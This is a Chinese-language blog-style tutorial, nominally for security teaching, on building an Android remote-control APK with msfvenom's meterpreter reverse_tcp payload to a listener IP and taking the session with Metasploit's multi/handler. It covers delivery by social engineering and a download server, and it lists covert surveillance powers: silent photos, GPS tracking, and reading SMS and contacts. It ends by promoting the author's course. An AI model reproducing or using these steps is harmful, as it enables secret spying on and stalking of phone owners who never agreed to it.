用于網(wǎng)絡(luò)安全教學(xué)，切勿用于不當(dāng)目的！

大多數(shù)情況下，安卓手機(jī)在安裝了惡意程序后，或多或少都會被遠(yuǎn)控，那么攻擊者在后臺通過指令獲取目標(biāo)安卓手機(jī)的遠(yuǎn)程靜默拍照、錄像、錄音、定位、獲取通訊錄和短信真的是不在話下了，下文我們就來探討下這種技術(shù)。

Msfvenom

Kali中的metasploit有一個工具，名為msfvenom，可以生成眾多版本的有效載荷，也就是可執(zhí)行遠(yuǎn)控。

比如，我們可以將生成的安卓apk可執(zhí)行程序經(jīng)過社工，安裝在目標(biāo)手機(jī)中，即可完成長期監(jiān)聽或跟蹤。那如何實(shí)現(xiàn)呢？這里我們就要用到msfvenom，接下來我們看看使用的方法。

生成安卓遠(yuǎn)控

• kali終端下輸入：

msfvenom -h 查看使用幫助

其中我們要關(guān)注的參數(shù)是，-p（指定攻擊有效載荷）-f（指定生成文件的格式）

msfvenom -l payloads
msfvenom -l formats

• 生成遠(yuǎn)控的完整命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

這里沒有使用-f參數(shù)，生成安卓可執(zhí)行程序，可以不用。

• 部署可執(zhí)行程序

將生成的安卓遠(yuǎn)控app安裝在目標(biāo)靶機(jī)中，可以通過搭建服務(wù)器，讓目標(biāo)下載安裝apk。

使用metasploit進(jìn)行監(jiān)聽

啟動msf

Kali終端下輸入：msfconsole

繼續(xù)輸入：

use exploit/multi/handler

本模塊專門用于設(shè)置獨(dú)立的連接受理程序，這是我們尋找的最后一塊拼圖！在這種使用遠(yuǎn)控載荷的情況下，設(shè)置multi/handler是必須的，否則無法進(jìn)程遠(yuǎn)程控制。

為該模塊設(shè)置參數(shù)：

show options
set LHOST 192.168.31.111
set lport 8888

這里的設(shè)置必須和前面用msfvenom的設(shè)置保持一致。

run
執(zhí)行偵聽，等待上線

• 得到meterpreter會話

一旦目標(biāo)安卓手機(jī)（靶機(jī)）用戶點(diǎn)擊了我們生成的test.apk圖標(biāo)，我們的kali就會監(jiān)聽到連接信號，得到一個遠(yuǎn)程控制目標(biāo)（靶機(jī)）手機(jī)的meterpreter會話。

輸入"？"即可顯示所有遠(yuǎn)程控制安卓手機(jī)的命令，我們這里選擇最精彩的三個：

遠(yuǎn)程拍照：目標(biāo)手機(jī)不會有任何察覺，屬于后臺系統(tǒng)拍照；

gps定位：直接顯示經(jīng)緯度地理位置，非常精準(zhǔn)；

查看短信與通訊錄；

由于平臺原因，就不明示寫出命令了。如需完整學(xué)習(xí)安卓嘿客，請進(jìn)入我頭條主頁，找到相應(yīng)專欄加入學(xué)習(xí)吧！

推薦閱讀：黔南都市網(wǎng)